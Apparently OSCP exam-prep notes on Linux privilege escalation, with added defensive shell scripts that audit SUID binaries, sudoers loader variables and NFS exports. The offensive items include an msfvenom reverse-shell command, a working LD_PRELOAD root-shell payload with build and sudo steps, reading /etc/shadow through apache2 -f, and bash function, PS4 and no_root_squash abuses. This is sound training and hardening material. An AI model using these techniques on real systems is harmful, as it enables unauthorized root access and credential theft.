Privilege Escalation on Linux


OSCP Notes

  1. Find executable files with the SUID or SGID bit set. Example: if /bin/bash has such permissions, you can spawn a root shell with the -p option (which keeps the elevated effective UID instead of dropping it).
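     The same `find` test, turned into a defender's audit. This is an added example, not part of the original notes: it lists SUID/SGID executables and reports any that are missing from an allow-list baseline, so a rogue set-id binary stands out. The function names (`list_setuid`, `audit_setuid`) and the baseline format (one absolute path per line, captured from a known-good host) are assumptions of this example.

```shell
#!/bin/sh
# Added example, not from the original notes: audit SUID/SGID executables
# against an allow-list so unexpected set-id binaries stand out.
# Assumed names: list_setuid, audit_setuid; the baseline file is one absolute
# path per line, constructed by the administrator from a known-good host.

# List regular files under $1 with the SUID (4000) or SGID (2000) bit set.
# "-perm -4000" means "at least these bits"; -xdev keeps find on one filesystem.
list_setuid() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null | sort
}

# Print each set-id file under $1 that is absent from the baseline file $2.
# Empty output means nothing unexpected was found.
audit_setuid() {
    list_setuid "$1" | while IFS= read -r path; do
        grep -qxF -- "$path" "$2" || printf '%s\n' "$path"
    done
}

# Typical use on a host, with a baseline captured at build time (hypothetical path):
#   audit_setuid / /var/lib/baselines/setuid.txt
```

     Run it from cron or a configuration-management check and alert on non-empty output; a new entry such as a set-id copy of a shell is exactly the case the note above describes.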

  2. msfvenom command to generate executable elf file for reverse shell

    $ msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > revshell.elf
    
  3. Native reverse shells: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md

  4. Kernel exploit suggestion tools

  5. Sudo

    • sudo -l to see what a user can run
    • Try: sudo -i, sudo -s, sudo /bin/bash, sudo passwd
  6. Shell escape - GTFObins

  7. tb3rius notes: the apache2 executable can be passed a file with the -f option, and when it cannot parse the file as a configuration it prints the first line in its error message. Passing /etc/shadow therefore reveals the root password hash.

  8. LD_PRELOAD: to exploit this, the sudo config must keep LD_PRELOAD in the environment (env_keep) and the user's real ID must match the effective ID, since the loader ignores untrusted LD_PRELOAD entries for set-id executables. Example preload C program to spawn a bash shell:

     /* preload.c: a shared object whose _init constructor runs as soon as the loader maps it */
     #include <stdio.h>
     #include <stdlib.h>
     #include <sys/types.h>
     #include <unistd.h>

     void _init() {
       unsetenv("LD_PRELOAD");   /* don't preload ourselves into the child shell */
       setresuid(0, 0, 0);       /* make the uid sudo granted real, effective and saved */
       system("/bin/bash -p");
     }

     $ gcc -fPIC -shared -nostartfiles -o /tmp/preload.so preload.c
     $ sudo LD_PRELOAD=/tmp/preload.so <command>
    
  9. LD_LIBRARY_PATH: similar to the above. Run ldd on the sudo-able binary to identify a shared object (.so) that our library can stand in for, then pass LD_LIBRARY_PATH pointing at that library's directory in the sudo command.
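     Items 8 and 9 both hinge on one misconfiguration: sudo passing the caller's loader variables through. The check below is an added example, not from the original notes, that flags the sudoers directives responsible. The function name `check_sudoers_env` is an assumption; the input is a file in sudoers syntax (or a saved copy of `sudo -l` output, which prints matching Defaults in the same form).

```shell
#!/bin/sh
# Added example, not from the original notes: flag sudoers settings that let a
# sudo-able command pick up the caller's LD_PRELOAD or LD_LIBRARY_PATH.
# Assumed name: check_sudoers_env; $1 is a sudoers-format file or saved
# `sudo -l` output.

# Print every uncommented directive that either keeps a loader variable via
# env_keep or switches env_reset off entirely. Exit status 1 means none found.
check_sudoers_env() {
    sed 's/#.*//' "$1" \
      | grep -E 'env_keep[[:space:]]*\+?=.*LD_(PRELOAD|LIBRARY_PATH)|!env_reset'
}

# Typical use:  check_sudoers_env /etc/sudoers
# A clean configuration keeps "Defaults env_reset" and never adds LD_* to env_keep.
```

     The remediation is the inverse of the finding: remove the LD_* names from env_keep and leave env_reset enabled, after which sudo scrubs both variables before running the command.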

Labs Linux/Windows PrivEsc workshop - https://github.com/sagishahar/lpeworkshop

  1. Older bash versions allow the creation of functions whose names contain a forward slash, and such a function takes precedence over the actual path. Create a function with steps to spawn a reverse shell. Also, versions lower than 4.4 inherit the PS4 environment variable when running as root, so if you set PS4 as a user, the root execution inherits and executes it.

  2. NFS enumeration commands on Linux:

    • showmount -e <target>
    • nmap -sV --script=nfs-showmount <target>
    • Mount the share: mount -o rw,vers=2 <target>:<share> <mountpoint>
    • The no_root_squash export setting disables root squashing, so a remote root user keeps uid 0 on the share.
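     On the server side, the setting to look for is in /etc/exports. The parser below is an added example, not from the original notes: it reports every client entry that carries no_root_squash, naming the share and the client it applies to. The function name `check_exports` is an assumption; the input is a file in /etc/exports syntax.

```shell
#!/bin/sh
# Added example, not from the original notes: report NFS exports that disable
# root squashing, so a remote root keeps uid 0 on the exported tree.
# Assumed name: check_exports; $1 is a file in /etc/exports syntax.

# Print "share client options" for every client entry carrying no_root_squash.
# A client field of "*" means the export is open to every host.
check_exports() {
    sed 's/#.*//' "$1" | awk '
        NF >= 2 {
            for (i = 2; i <= NF; i++) {
                if ($i ~ /no_root_squash/) {
                    p = index($i, "(")
                    client = (p > 1) ? substr($i, 1, p - 1) : "*"
                    print $1, client, $i
                }
            }
        }'
}

# Typical use:  check_exports /etc/exports
```

     Anything this prints should be reviewed against the default of root_squash; an export that genuinely needs no_root_squash should at least be restricted to a named client rather than `*`.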